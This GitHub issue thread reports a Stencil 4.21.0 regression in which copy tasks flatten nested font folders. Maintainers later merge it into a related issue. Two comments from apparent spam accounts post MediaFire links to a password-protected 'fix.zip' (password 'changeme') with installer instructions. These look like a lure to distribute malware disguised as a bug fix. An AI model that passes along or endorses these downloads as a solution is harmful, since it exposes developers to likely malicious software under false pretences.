### ISSUE TITLE
bug: 

### ISSUE THREAD

**Issue by Tallyb** [ionic-team/stencil#5955]
### Prerequisites

- [X] I have read the [Contributing Guidelines](https://github.com/ionic-team/stencil/blob/main/CONTRIBUTING.md).
- [X] I agree to follow the [Code of Conduct](https://github.com/ionic-team/stencil/blob/main/CODE_OF_CONDUCT.md).
- [X] I have searched for [existing issues](https://github.com/ionic-team/stencil/issues) that already report this problem, without success.

### Stencil Version

4.21.0

### Current Behavior

Fonts copied by a copy task are being flattened under the target folder and do not preserve original structure
 

### Expected Behavior

This is a breaking change and should be documented as such if it is intended. 

### System Info

```shell
System: node 20.16.0
    Platform: darwin (23.6.0)
   CPU Model: Intel(R) Core(TM) i9-9880H CPU @ 2.30GHz (16 cpus)
    Compiler: .../@stencil/core/compiler/stencil.js
       Build: 1722623140
     Stencil: 4.21.0 
  TypeScript: 5.5.3
      Rollup: 2.56.3
      Parse5: 7.1.2
      jQuery: 4.0.0-pre
      Terser: 5.31.1
```

### Steps to Reproduce

create copy task      { src: 'fonts', dest: '../design-system/assets/fonts' }
src folder has. multiple folders for different fonts. 
when copied in version 4.20 the result is multiple folder under the target folder. 
When copied in. version 4.21. the result is a flat structure of all the fonts

### Code Reproduction URL

N/A

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by christian-bromann** [comment]
This seems to be a regression from https://github.com/ionic-team/stencil/issues/5899

**Comment by christian-bromann** [comment]
Duplicate of #5955

**Comment by Tallyb** [comment]
@christian-bromann  - I am not following: you marked this as a validated bug, but then closed it as duplicate of itself and not planned. Does that mean this is the new behaviour?

**Comment by christian-bromann** [comment]
Apology, I used a wrong issue number, I discovered #5956 speaks about the same / similar problem so I merged this issue into #5956
